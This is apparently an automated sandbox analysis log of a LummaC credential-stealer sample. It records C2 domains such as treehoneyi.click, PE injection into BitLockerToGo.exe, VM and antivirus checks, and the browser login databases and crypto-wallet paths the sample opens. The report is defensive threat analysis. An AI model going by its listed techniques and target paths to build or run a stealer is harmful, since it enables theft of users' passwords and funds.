                Source: BitLockerToGo.exe, BitLockerToGo.exe, 00000002.00000003.2052483380.0000000004DFB000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.2099469682.0000000002A5D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2098981402.0000000004DF9000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.2099926152.0000000004DF2000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2098750489.0000000002A8F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2098966843.0000000004DF2000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.2099941330.0000000004DFB000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.2099597168.0000000002AF8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2098750489.0000000002A5D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2069182897.0000000002AF8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2028290120.0000000004DF1000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1999447521.0000000004DF1000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1999741792.0000000004DF2000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2069239176.0000000004DFB000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2029666880.0000000004DF9000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2000294448.0000000004DF1000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2005117624.0000000004DF1000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.2099469682.0000000002A8F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://treehoneyi.click/api
                Source: BitLockerToGo.exe, 00000002.00000002.2099469682.0000000002A5D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2098750489.0000000002A5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://treehoneyi.click/api0
                Source: BitLockerToGo.exe, 00000002.00000003.2069182897.0000000002AF8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://treehoneyi.click/apiOH
                Source: BitLockerToGo.exe, 00000002.00000002.2099926152.0000000004DF2000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2098966843.0000000004DF2000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2028290120.0000000004DF1000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1999447521.0000000004DF1000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1999741792.0000000004DF2000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2000294448.0000000004DF1000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2005117624.0000000004DF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://treehoneyi.click/h
                Source: BitLockerToGo.exe, 00000002.00000003.2098950995.0000000002B05000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.2099641821.0000000002B06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://treehoneyi.click/s
                Source: BitLockerToGo.exe, 00000002.00000002.2099469682.0000000002A74000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://treehoneyi.click:443/api
                Source: BitLockerToGo.exe, 00000002.00000003.2098750489.0000000002A74000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.2099469682.0000000002A74000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://treehoneyi.click:443/apin.txtPK
                Source: BitLockerToGo.exe, 00000002.00000003.1951766814.0000000004E3A000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1951683467.0000000004E3D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: BitLockerToGo.exe, 00000002.00000003.1951766814.0000000004E3A000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1951683467.0000000004E3D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: BitLockerToGo.exe, 00000002.00000003.2004720040.0000000004F19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
                Source: BitLockerToGo.exe, 00000002.00000003.2004720040.0000000004F19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
                Source: BitLockerToGo.exe, 00000002.00000003.2004720040.0000000004F19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                Source: BitLockerToGo.exe, 00000002.00000003.2004720040.0000000004F19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                Source: BitLockerToGo.exe, 00000002.00000003.2004720040.0000000004F19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
                Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
                Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                Source: unknownHTTPS traffic detected: 172.67.180.113:443 -> 192.168.2.4:49735 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.180.113:443 -> 192.168.2.4:49737 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.180.113:443 -> 192.168.2.4:49738 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.180.113:443 -> 192.168.2.4:49739 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.180.113:443 -> 192.168.2.4:49740 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.180.113:443 -> 192.168.2.4:49741 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.180.113:443 -> 192.168.2.4:49742 version: TLS 1.2
                Source: MPySEh8HaF.exe, 00000000.00000000.1674737489.0000000001715000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFileNameEasyBackup.exe8 vs MPySEh8HaF.exe
                Source: MPySEh8HaF.exeBinary or memory string: OriginalFileNameEasyBackup.exe8 vs MPySEh8HaF.exe
                Source: MPySEh8HaF.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DEBUG_STRIPPED
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/0@1/1
                Source: MPySEh8HaF.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\MPySEh8HaF.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: BitLockerToGo.exe, 00000002.00000003.1952260514.0000000004DF5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: MPySEh8HaF.exeReversingLabs: Detection: 55%
                Source: MPySEh8HaF.exeVirustotal: Detection: 58%
                Source: MPySEh8HaF.exeString found in binary or memory: @v1.5.6/loadconfig.go
                Source: MPySEh8HaF.exeString found in binary or memory: overflow:hidden;img src="http://addEventListenerresponsible for s.js"></script>
                Source: unknownProcess created: C:\Users\user\Desktop\MPySEh8HaF.exe "C:\Users\user\Desktop\MPySEh8HaF.exe"
                Source: C:\Users\user\Desktop\MPySEh8HaF.exeProcess created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                Source: C:\Users\user\Desktop\MPySEh8HaF.exeProcess created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"Jump to behavior
                Source: C:\Users\user\Desktop\MPySEh8HaF.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\MPySEh8HaF.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\MPySEh8HaF.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Users\user\Desktop\MPySEh8HaF.exeSection loaded: umpdc.dllJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: webio.dllJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: MPySEh8HaF.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                Source: MPySEh8HaF.exeStatic file information: File size 7409664 > 1048576
                Source: MPySEh8HaF.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x328800
                Source: MPySEh8HaF.exeStatic PE information: Raw size of .rdata is bigger than: 0x100000 < 0x301a00
                Source: MPySEh8HaF.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                Source: MPySEh8HaF.exeStatic PE information: section name: .symtab
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_3_02AF2469 push esi; retf 2_3_02AF246C
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_3_02AF2469 push esi; retf 2_3_02AF246C
                Source: C:\Users\user\Desktop\MPySEh8HaF.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\MPySEh8HaF.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Query firmware table information (likely to detect VMs)
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSystem information queried: FirmwareTableInformationJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe TID: 7720Thread sleep time: -180000s >= -30000sJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe TID: 7720Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                Source: BitLockerToGo.exe, 00000002.00000002.2099469682.0000000002A5D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2098750489.0000000002A5D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWpL
                Source: MPySEh8HaF.exe, 00000000.00000002.1898714399.0000000000B57000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllP
                Source: BitLockerToGo.exe, BitLockerToGo.exe, 00000002.00000003.2098750489.0000000002A8F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.2099536682.0000000002A98000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2028308961.0000000002A96000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2052496714.0000000002A96000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2098922886.0000000002A96000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information queried: ProcessInformationJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Allocates memory in foreign processes
                Source: C:\Users\user\Desktop\MPySEh8HaF.exeMemory allocated: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 530000 protect: page execute and read and writeJump to behavior
                Injects a PE file into a foreign processes
                Source: C:\Users\user\Desktop\MPySEh8HaF.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 530000 value starts with: 4D5AJump to behavior
                LummaC encrypted strings found
                Source: MPySEh8HaF.exe, 00000000.00000002.1901746510.000000000A304000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: rapeflowwj.lat
                Source: MPySEh8HaF.exe, 00000000.00000002.1901746510.000000000A304000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: crosshuaht.lat
                Source: MPySEh8HaF.exe, 00000000.00000002.1901746510.000000000A304000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: sustainskelet.lat
                Source: MPySEh8HaF.exe, 00000000.00000002.1901746510.000000000A304000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: aspecteirs.lat
                Source: MPySEh8HaF.exe, 00000000.00000002.1901746510.000000000A304000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: energyaffai.lat
                Source: MPySEh8HaF.exe, 00000000.00000002.1901746510.000000000A304000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: necklacebudi.lat
                Source: MPySEh8HaF.exe, 00000000.00000002.1901746510.000000000A304000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: discokeyus.lat
                Source: MPySEh8HaF.exe, 00000000.00000002.1901746510.000000000A304000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: grannyejh.lat
                Source: MPySEh8HaF.exe, 00000000.00000002.1901746510.000000000A304000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: treehoneyi.click
                Writes to foreign memory regions
                Source: C:\Users\user\Desktop\MPySEh8HaF.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 613008Jump to behavior
                Source: C:\Users\user\Desktop\MPySEh8HaF.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 530000Jump to behavior
                Source: C:\Users\user\Desktop\MPySEh8HaF.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 531000Jump to behavior
                Source: C:\Users\user\Desktop\MPySEh8HaF.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 570000Jump to behavior
                Source: C:\Users\user\Desktop\MPySEh8HaF.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 573000Jump to behavior
                Source: C:\Users\user\Desktop\MPySEh8HaF.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 582000Jump to behavior
                Source: C:\Users\user\Desktop\MPySEh8HaF.exeProcess created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"Jump to behavior
                Source: C:\Users\user\Desktop\MPySEh8HaF.exeQueries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\MPySEh8HaF.exeQueries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformationJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: BitLockerToGo.exe, 00000002.00000003.2052527856.0000000002AFD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2052439419.0000000004E00000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2052496714.0000000002A96000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                Stealing of Sensitive Information

                barindex
                Yara detected LummaC Stealer
                Source: Yara matchFile source: Process Memory Space: BitLockerToGo.exe PID: 7676, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                Found many strings related to Crypto-Wallets (likely being stolen)
                Source: BitLockerToGo.exeString found in binary or memory: Wallets/Electrum-LTC
                Source: BitLockerToGo.exeString found in binary or memory: Wallets/ElectronCash
                Source: BitLockerToGo.exeString found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
                Source: BitLockerToGo.exeString found in binary or memory: window-state.json
                Source: BitLockerToGo.exe, 00000002.00000003.2028308961.0000000002A96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.wallet
                Source: BitLockerToGo.exeString found in binary or memory: ExodusWeb3
                Source: BitLockerToGo.exeString found in binary or memory: Wallets/Ethereum
                Source: BitLockerToGo.exeString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                Source: BitLockerToGo.exeString found in binary or memory: keystore
                Source: BitLockerToGo.exe, 00000002.00000003.2028308961.0000000002A96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Livel
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.jsJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
